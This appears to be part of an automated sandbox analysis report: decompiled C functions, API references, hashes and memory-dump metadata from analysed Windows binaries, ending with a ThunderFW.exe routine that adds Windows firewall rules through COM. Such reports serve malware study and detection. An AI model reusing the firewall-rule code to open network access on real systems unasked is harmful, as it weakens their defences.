							__eax =  *((intOrPtr*)(__edi + 0x6c0));
							_t4 = __esi + 1; // 0x1
							__ecx = _t4;
							__eflags = __ecx -  *((intOrPtr*)(__eax + 0x30));
							if(__ecx >=  *((intOrPtr*)(__eax + 0x30))) {
								__ecx = 0x40f454;
							} else {
								__ecx = __eax;
							}
							__eflags =  *__ecx - 0x7e;
							__eax =  *((intOrPtr*)(__edi + 0x69c));
							if(__eflags != 0) {
							} else {
								_push(1);
								__ecx = __ecx + 2;
							}
							_push(__ecx);
							__eax = E0040A084(__eax, __eflags);
						}
						__eax =  *((intOrPtr*)(__edi + 0x6c0));
						__esi = __esi + 1;
						__eflags = __esi -  *((intOrPtr*)(__eax + 0x30));
					} while (__esi <  *((intOrPtr*)(__eax + 0x30)));
					goto L11;
				}
				L1:
				return SetCursor( *0x412390);
			}

0x0040a4c5
0x0040a4d4
0x0040a528
0x0040a528
0x0040a533
0x0040a53e
0x0040a54c
0x0040a551
0x0040a554
0x0040a599
0x00000000
0x0040a59b
0x0040a556
0x0040a55c
0x0040a562
0x0040a56a
0x0040a56f
0x0040a56f
0x0040a585
0x0040a591
0x00000000
0x0040a4d6
0x0040a4d6
0x0040a4db
0x0040a4dd
0x0040a4e2
0x0040a4e4
0x0040a4e6
0x0040a4ec
0x0040a4ec
0x0040a4ef
0x0040a4f2
0x0040a4fd
0x0040a4f4
0x0040a4f9
0x0040a4f9
0x0040a502
0x0040a506
0x0040a50c
0x0040a50e
0x0040a50e
0x0040a510
0x0040a510
0x0040a516
0x0040a517
0x0040a517
0x0040a51c
0x0040a522
0x0040a523
0x0040a523
0x00000000
0x0040a4d6
0x004052a6
0x004052b2

APIs

qsort.MSVCRT ref: 0040A591

Part of subcall function 004065EE: _wcsicmp.MSVCRT ref: 00406604

Strings

/nosort, xrefs: 0040A547
/sort, xrefs: 0040A4D6

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcsicmpqsort
String ID: /nosort$/sort
API String ID: 1579243037-1578091866
Opcode ID: 124884d5dc6559089fffaca0d7121966e37f59272275963d4074e0ad8fb9bc0b
Instruction ID: 6b5ec6eb7515bc088160010cb6f8a328b32efe940b1a3fb6a30810c5b3da645c
Opcode Fuzzy Hash: 124884d5dc6559089fffaca0d7121966e37f59272275963d4074e0ad8fb9bc0b
Instruction Fuzzy Hash: 8821D370600600FFC714EF26C885DA6B3A5FB44328B01017EE915BB6E1C779BC608B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00405E81, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00405E81(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040DFD6();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}

0x00405e84
0x00405e87
0x00405e8b
0x00405e90
0x00405e93
0x00405f05
0x00405e95
0x00405e97
0x00405e99
0x00405e9e
0x00405ea0
0x00405ea3
0x00405ea3
0x00405ead
0x00405eae
0x00405eaf
0x00405eb0
0x00405eb1
0x00405eba
0x00405ebb
0x00405ec3
0x00405ec5
0x00405ec6
0x00405ed4
0x00405ed6
0x00405edb
0x00405ede
0x00405ee6
0x00000000
0x00000000
0x00405ee8
0x00405eec
0x00405eed
0x00405ef3
0x00000000
0x00000000
0x00000000
0x00405ef3
0x00405ef5
0x00405ef5
0x00405ef8
0x00405f01
0x00405f02
0x00405f09

APIs

_snwprintf.MSVCRT ref: 00405EC6
memcpy.MSVCRT ref: 00405ED6

Strings

%2.2X , xrefs: 00405EBB

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfmemcpy
String ID: %2.2X
API String ID: 2789212964-323797159
Opcode ID: 5646eba8dd4affce10f05f382f775d9093a619cdef628270f3a0be2943da427e
Instruction ID: 09870db8f10325833ee0949f0b54b8ee796ec7cfb255f8a941d73aa4e244bb5d
Opcode Fuzzy Hash: 5646eba8dd4affce10f05f382f775d9093a619cdef628270f3a0be2943da427e
Instruction Fuzzy Hash: 33118232904609BFDB10DFE8C8869AF73B9FB44314F108477ED11E7181E6789A158BD5

Uniqueness

Uniqueness Score: -1.00%

Function 00405DCD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DCD(intOrPtr* __ebx, intOrPtr __ecx, wchar_t* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v60;
				intOrPtr _v64;
				wchar_t* _v68;
				intOrPtr _v72;
				signed int _v80;
				intOrPtr _v84;
				intOrPtr _v92;
				struct tagOFNA _v96;
				intOrPtr _t23;
				intOrPtr* _t33;
				intOrPtr _t34;
				wchar_t* _t38;

				_t38 = __edi;
				_t34 = __ecx;
				_t33 = __ebx;
				_t23 = 1;
				if(__ebx != 0) {
					_t23 =  *__ebx;
				}
				_v80 = _v80 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v52 = _v52 & 0x00000000;
				_v72 = _t23;
				_v48 = _a8;
				_v36 = _a12;
				_v92 = _t34;
				_v96 = 0x58;
				_v84 = _a4;
				_v68 = _t38;
				_v64 = 0x104;
				_v44 = 0x80806;
				if(GetSaveFileNameW( &_v96) == 0) {
					return 0;
				} else {
					if(_t33 != 0) {
						 *_t33 = _v72;
					}
					wcscpy(_t38, _v68);
					return 1;
				}
			}

0x00405dcd
0x00405dcd
0x00405dcd
0x00405dd5
0x00405dd8
0x00405dda
0x00405dda
0x00405ddc
0x00405de0
0x00405de4
0x00405de8
0x00405dee
0x00405df4
0x00405df7
0x00405e01
0x00405e08
0x00405e0b
0x00405e0e
0x00405e15
0x00405e24
0x00405e42
0x00405e26
0x00405e28
0x00405e2d
0x00405e2d
0x00405e33
0x00405e3e
0x00405e3e

APIs

GetSaveFileNameW.COMDLG32(?), ref: 00405E1C
wcscpy.MSVCRT ref: 00405E33

Strings

X, xrefs: 00405E01

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: FileNameSavewcscpy
String ID: X
API String ID: 3080202770-3081909835
Opcode ID: a0857a089f4deec4c1b474bd9ffc3361d4690667bb8dbb74d33b67a2b866139b
Instruction ID: 35274199d236effe9a648b535348c56afb13a0cf633c63e6ee0ccd6430c010a7
Opcode Fuzzy Hash: a0857a089f4deec4c1b474bd9ffc3361d4690667bb8dbb74d33b67a2b866139b
Instruction Fuzzy Hash: D80192B1D106599FDF10DFE9D88479EBBF4FB08319F10842AE815EA284DBB499098F54

Uniqueness

Uniqueness Score: -1.00%

Function 0040196B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040196B(void* __eax, void* __ecx, intOrPtr* __esi) {
				intOrPtr _v8;
				void* __ebx;
				intOrPtr _t10;
				void* _t14;
				WINDOWPLACEMENT* _t15;
				void* _t18;
				struct HWND__* _t23;
				intOrPtr* _t24;

				_t24 = __esi;
				_t18 = __eax;
				_t1 = _t24 + 4; // 0x40d794
				_t10 =  *_t1;
				_v8 = _t10;
				if(_t10 == 0) {
					memset(__eax + 0x248, 0, 0x2c);
				} else {
					_t23 =  *(__eax + 0x208);
					if(_t23 != 0) {
						_t15 = __eax + 0x248;
						_t15->length = 0x2c;
						GetWindowPlacement(_t23, _t15);
					}
				}
				_t14 =  *((intOrPtr*)( *_t24 + 0xc))(L"WinPos", _t18 + 0x248, 0x2c);
				if(_v8 == 0) {
					_t14 = E004019D2(_t18);
				}
				return _t14;
			}

0x0040196b
0x00401970
0x00401972
0x00401972
0x00401977
0x0040197a
0x004019a7
0x0040197c
0x0040197c
0x00401984
0x00401986
0x0040198e
0x00401994
0x00401994
0x00401984
0x004019c1
0x004019c8
0x004019ca
0x004019ca
0x004019d1

APIs

GetWindowPlacement.USER32(?,?,00000002,?,?,0040B20B,?,?,?,00000002,?,?,?,?,?,00000000), ref: 00401994
memset.MSVCRT ref: 004019A7

Strings

WinPos, xrefs: 004019BA

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: PlacementWindowmemset
String ID: WinPos
API String ID: 4036792311-2823255486
Opcode ID: 81be9ea41e6d398efb68a6c6dc4070ed39b463af53e59a3c9cc3062c0f115d68
Instruction ID: 309fedf9ece379f47234066dfb297f1f11f9bdd101b0f57d7b7a510f29a8e9ac
Opcode Fuzzy Hash: 81be9ea41e6d398efb68a6c6dc4070ed39b463af53e59a3c9cc3062c0f115d68
Instruction Fuzzy Hash: 3CF062B0610204EFEB54DF55C899FAE33E99F04700F54017AE9099F1D1EBB89D44C769

Uniqueness

Uniqueness Score: -1.00%

Function 00407170, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00407170(void* __ecx, void* __eflags, struct HINSTANCE__* _a4) {
				void _v8198;
				short _v8200;
				int _t11;
				int _t16;

				E0040E340(0x2004, __ecx);
				_t16 = 0;
				_v8200 = 0;
				memset( &_v8198, 0, 0x2000);
				do {
					_t11 = LoadStringW(_a4, _t16,  &_v8200, 0x1000);
					if(_t11 > 0) {
						_t11 = E00406E5E(_t16,  &_v8200);
					}
					_t16 = _t16 + 1;
				} while (_t16 <= 0xffff);
				return _t11;
			}

0x00407178
0x0040717e
0x0040718d
0x00407194
0x0040719c
0x004071ac
0x004071b4
0x004071be
0x004071c4
0x004071c5
0x004071c6
0x004071d0

APIs

memset.MSVCRT ref: 00407194
LoadStringW.USER32(00412E48,00000000,?,00001000), ref: 004071AC

Part of subcall function 00406E5E: memset.MSVCRT ref: 00406E71
Part of subcall function 00406E5E: _itow.MSVCRT ref: 00406E7F

Strings

;t@, xrefs: 00407170

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$LoadString_itow
String ID: ;t@
API String ID: 2363904170-3941608961
Opcode ID: abd66195640579f6e500643e127a0019a6d222aabc7e30448b3f27de400d40d8
Instruction ID: 51c9355171e471fb499396a2aa2e6012e16bb247b54c8a94724daa36fdc5b9b4
Opcode Fuzzy Hash: abd66195640579f6e500643e127a0019a6d222aabc7e30448b3f27de400d40d8
Instruction Fuzzy Hash: 5BF0A73290032829F724AA56DD4ABDB7B6CDF05754F0000B6BB0CF61D2D634AA50CBEE

Uniqueness

Uniqueness Score: -1.00%

Function 004073D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004073D0(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00405800(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}

0x004073d0
0x004073d1
0x004073d9
0x004073e3
0x004073e5
0x004073e5
0x004073f6

APIs

Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B

wcsrchr.MSVCRT ref: 004073D9
wcscat.MSVCRT ref: 004073EF

Strings

_lng.ini, xrefs: 004073E9

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleNamewcscatwcsrchr
String ID: _lng.ini
API String ID: 383090722-1948609170
Opcode ID: ac25628e4bbd1f7f59230636c7e582e2e1885c094a405939c83156bbf3aedd80
Instruction ID: d66fa5373373d5564c67ff94d3685b1a514421eeb891155236f9d41770c1593b
Opcode Fuzzy Hash: ac25628e4bbd1f7f59230636c7e582e2e1885c094a405939c83156bbf3aedd80
Instruction Fuzzy Hash: AEC0125394561154E12132125C03B4F21448F06314F70003BFC06744C2ABFD6115C06F

Uniqueness

Uniqueness Score: -1.00%

Function 004075A6, Relevance: 5.1, APIs: 4, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004075A6(intOrPtr* __esi, void* __eflags) {
				intOrPtr* _t33;
				intOrPtr* _t42;

				_t42 = __esi;
				 *__esi = 0x410168;
				 *((intOrPtr*)(__esi + 0x2f0)) = 0;
				_t33 = E00405CF8(0x34c, __esi);
				_push(0x14);
				 *((intOrPtr*)(__esi + 0x33c)) = 0;
				 *((intOrPtr*)(__esi + 0x348)) = 0;
				 *((intOrPtr*)(__esi + 0x2dc)) = 0;
				 *((intOrPtr*)(__esi + 0x2a0)) = 0;
				 *((intOrPtr*)(__esi + 0x2f4)) = 0;
				 *((intOrPtr*)(__esi + 0x2f8)) = 0xfff;
				 *((intOrPtr*)(__esi + 0x20)) = 0;
				 *((intOrPtr*)(__esi + 4)) = 0;
				 *((intOrPtr*)(__esi + 0x2a8)) = 0;
				 *((intOrPtr*)(__esi + 0x2ec)) = 1;
				L0040E038();
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					 *((intOrPtr*)(_t33 + 0xc)) = 0;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0;
					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t33 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t42 + 8)) = _t33;
				L0040E038();
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					 *((intOrPtr*)(_t33 + 0xc)) = 0;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0;
					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t33 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t42 + 0xc)) = _t33;
				L0040E038();
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					 *((intOrPtr*)(_t33 + 0xc)) = 0;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0;
					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t33 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t42 + 0x10)) = _t33;
				L0040E038();
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					 *((intOrPtr*)(_t33 + 0xc)) = 0;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0;
					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t33 + 8)) = 0;
				}
				 *((intOrPtr*)(_t42 + 0x14)) = _t33;
				return _t42;
			}

0x004075a6
0x004075b0
0x004075b6
0x004075bc
0x004075c1
0x004075c3
0x004075c9
0x004075cf
0x004075d5
0x004075db
0x004075e1
0x004075eb
0x004075ee
0x004075f1
0x004075f7
0x00407601
0x0040760f
0x00407621
0x00407611
0x00407611
0x00407614
0x00407616
0x00407619
0x0040761c
0x0040761c
0x00407623
0x00407625
0x00407628
0x00407630
0x00407642
0x00407632
0x00407632
0x00407635
0x00407637
0x0040763a
0x0040763d
0x0040763d
0x00407644
0x00407646
0x00407649
0x00407651
0x00407663
0x00407653
0x00407653
0x00407656
0x00407658
0x0040765b
0x0040765e
0x0040765e
0x00407665
0x00407667
0x0040766a
0x00407672
0x00407684
0x00407674
0x00407674
0x00407677
0x00407679
0x0040767c
0x0040767f
0x0040767f
0x00407687
0x0040768d

APIs

Part of subcall function 00405CF8: memset.MSVCRT ref: 00405D06

??2@YAPAXI@Z.MSVCRT ref: 00407601
??2@YAPAXI@Z.MSVCRT ref: 00407628
??2@YAPAXI@Z.MSVCRT ref: 00407649
??2@YAPAXI@Z.MSVCRT ref: 0040766A

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$memset
String ID:
API String ID: 1860491036-0
Opcode ID: c889cf0ef11d6ee6e19e236316b87eec8e7d4ceedb9811563d0e99fe09c66d75
Instruction ID: 6ad8090dc912b32accdf13bb09e5540cd70d669e40ded14db292eecac2a9bd8b
Opcode Fuzzy Hash: c889cf0ef11d6ee6e19e236316b87eec8e7d4ceedb9811563d0e99fe09c66d75
Instruction Fuzzy Hash: 7F31B2B0945B018ED7648F2BC484A56FAE8BF90310F2589AFD15ADB2B1D7F99440CF15

Uniqueness

Uniqueness Score: -1.00%

Function 00406264, Relevance: 5.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406264(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E0040562D(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E0040562D(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}

0x0040626f
0x00406271
0x00406276
0x00406279
0x0040627c
0x0040627f
0x00406283
0x00406286
0x0040628a
0x0040628d
0x00406290
0x004062a0
0x00406292
0x00406294
0x00406294
0x004062a6
0x004062ac
0x004062b0
0x004062b3
0x004062c4
0x004062b5
0x004062b7
0x004062b7
0x004062db
0x004062e6
0x004062f3
0x004062f6
0x004062fd
0x00406303

APIs

wcslen.MSVCRT ref: 00406271
free.MSVCRT(?,00000000,?,00000001,?,?,?,004065A8,?,74784E00,?,00000000), ref: 00406294

Part of subcall function 0040562D: malloc.MSVCRT ref: 00405649
Part of subcall function 0040562D: memcpy.MSVCRT ref: 00405661
Part of subcall function 0040562D: free.MSVCRT(00000000,00000000,?,00406343,00000002,?,00000000,?,0040655F,74784E00,?,00000000), ref: 0040566A

free.MSVCRT(?,00000000,?,00000001,?,?,?,004065A8,?,74784E00,?,00000000), ref: 004062B7
memcpy.MSVCRT ref: 004062DB

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: free$memcpy$mallocwcslen
String ID:
API String ID: 726966127-0
Opcode ID: 8efed790d319c7eb988e68133398513d2f98d8a3c3203aacdd794e8cb7bc8c6e
Instruction ID: 328e5c77b206eb01c5c4dd085cb03c2c4ac654035e51f3c9fb1ea2fb7f212fdc
Opcode Fuzzy Hash: 8efed790d319c7eb988e68133398513d2f98d8a3c3203aacdd794e8cb7bc8c6e
Instruction Fuzzy Hash: 3A21AEB1600704EFC730EF19D881C9AB7F9EF483247104A2EF856A7291D775B925CB58

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ThunderFW.exe PID: 6188 Parent PID: 6676 ThunderFW.exeCOMMON

Executed Functions

Function 00011058, Relevance: 1.5, APIs: 1, Instructions: 7comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0001DB0C,00000000,00000001,0001DB1C,?,00011135,00000000), ref: 0001106A

Memory Dump Source

Source File: 00000015.00000002.410276427.0000000000011000.00000020.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000015.00000002.410268187.0000000000010000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410309689.000000000001C000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410320447.000000000001F000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.410341332.0000000000021000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: c8e07dec8cd1a4183d7b8e9aa938b1df0b1003a7c1a2a8d5daf31c835407e4cf
Instruction ID: 1a6ea54c150d33ea1d07e6674c61f55ff416d67b85ea46c2744d41acaff3389f
Opcode Fuzzy Hash: c8e07dec8cd1a4183d7b8e9aa938b1df0b1003a7c1a2a8d5daf31c835407e4cf
Instruction Fuzzy Hash: 5CB012307C8300F6FD1017505D87FC67A216740F00F114401B3022C0D2C3E64080D601

Uniqueness

Uniqueness Score: -1.00%

Function 00011372, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 191
comCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00011372(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr _t96;
				intOrPtr* _t97;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr* _t101;
				intOrPtr* _t103;
				intOrPtr* _t105;
				intOrPtr* _t107;
				intOrPtr* _t109;
				intOrPtr* _t111;
				intOrPtr* _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr* _t119;
				intOrPtr* _t121;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr* _t131;
				intOrPtr* _t133;
				void* _t135;
				void* _t163;
				void* _t166;
				signed int _t167;
				intOrPtr* _t169;

				_t167 = 0;
				_v16 = 0x80004005;
				_v24 = 0;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_v28 = E000180F0(__edx, _a4);
				_v32 = E000180F0(__edx, "ThunderNetWork");
				_t85 = E000180F0(__edx, _a8);
				_v36 = _t85;
				__imp__CoInitializeEx(0, 2, _t166); // executed
				_v40 = _t85;
				if(_t85 == 0x80010106 || _t85 >= 0) {
					_t87 = E00011058( &_v24,  &_v24);
					_v16 = _t87;
					if(_t87 >= _t167) {
						_t95 = _v24;
						_t96 =  *((intOrPtr*)( *_t95 + 0x48))(_t95,  &_v20);
						_v16 = _t96;
						if(_t96 >= _t167) {
							_t97 = _v24;
							_t98 =  *((intOrPtr*)( *_t97 + 0x1c))(_t97,  &_v12);
							_v16 = _t98;
							if(_t98 >= _t167) {
								if((_v12 & 0x00000004) != 0 && _v12 != 4) {
									_v12 = _v12 ^ 0x00000004;
								}
								_t169 = __imp__CoCreateInstance;
								_t100 =  *_t169(0x1db2c, _t167, 1, 0x1db3c,  &_v8, _t163, _t135); // executed
								_v16 = _t100;
								if(_t100 >= 0) {
									_t101 = _v8;
									 *((intOrPtr*)( *_t101 + 0x20))(_t101, _v28);
									_t103 = _v8;
									 *((intOrPtr*)( *_t103 + 0x28))(_t103, _v32);
									_t105 = _v8;
									 *((intOrPtr*)( *_t105 + 0x30))(_t105, _v36);
									_t107 = _v8;
									 *((intOrPtr*)( *_t107 + 0x40))(_t107, 6);
									_t109 = _v8;
									 *((intOrPtr*)( *_t109 + 0x98))(_t109, _v12);
									_t111 = _v8;
									 *((intOrPtr*)( *_t111 + 0xa8))(_t111, 1);
									_t113 = _v8;
									 *((intOrPtr*)( *_t113 + 0x88))(_t113, 0xffffffff);
									_t115 = _v20;
									 *((intOrPtr*)( *_t115 + 0x20))(_t115, _v8);
									_t118 =  *_t169(0x1db2c, 0, 1, 0x1db3c,  &_v8);
									_v16 = _t118;
									if(_t118 >= 0) {
										_t119 = _v8;
										 *((intOrPtr*)( *_t119 + 0x20))(_t119, _v28);
										_t121 = _v8;
										 *((intOrPtr*)( *_t121 + 0x28))(_t121, _v32);
										_t123 = _v8;
										 *((intOrPtr*)( *_t123 + 0x30))(_t123, _v36);
										_t125 = _v8;
										 *((intOrPtr*)( *_t125 + 0x40))(_t125, 0x11);
										_t127 = _v8;
										 *((intOrPtr*)( *_t127 + 0x98))(_t127, _v12);
										_t129 = _v8;
										 *((intOrPtr*)( *_t129 + 0xa8))(_t129, 1);
										_t131 = _v8;
										 *((intOrPtr*)( *_t131 + 0x88))(_t131, 0xffffffff);
										_t133 = _v20;
										_v16 =  *((intOrPtr*)( *_t133 + 0x20))(_t133, _v8);
									}
								}
								_t167 = 0;
							}
						}
					}
				}
				_t88 = _v8;
				if(_t88 != _t167) {
					 *((intOrPtr*)( *_t88 + 8))(_t88);
				}
				_t89 = _v20;
				if(_t89 != _t167) {
					 *((intOrPtr*)( *_t89 + 8))(_t89);
				}
				_t90 = _v24;
				if(_t90 != _t167) {
					 *((intOrPtr*)( *_t90 + 8))(_t90);
				}
				if(_v40 >= _t167) {
					__imp__CoUninitialize(); // executed
				}
				return _v16;
			}

0x0001137c
0x0001137e
0x00011385
0x00011388
0x0001138b
0x0001138e
0x0001139b
0x000113a6
0x000113a9
0x000113b1
0x000113b4
0x000113ba
0x000113c2
0x000113d0
0x000113d8
0x000113db
0x000113e1
0x000113eb
0x000113f0
0x000113f3
0x000113f9
0x00011403
0x00011408
0x0001140b
0x00011415
0x0001141d
0x0001141d
0x00011430
0x0001143c
0x0001143e
0x00011443
0x00011449
0x00011452
0x00011455
0x0001145e
0x00011461
0x0001146a
0x0001146d
0x00011475
0x00011478
0x00011481
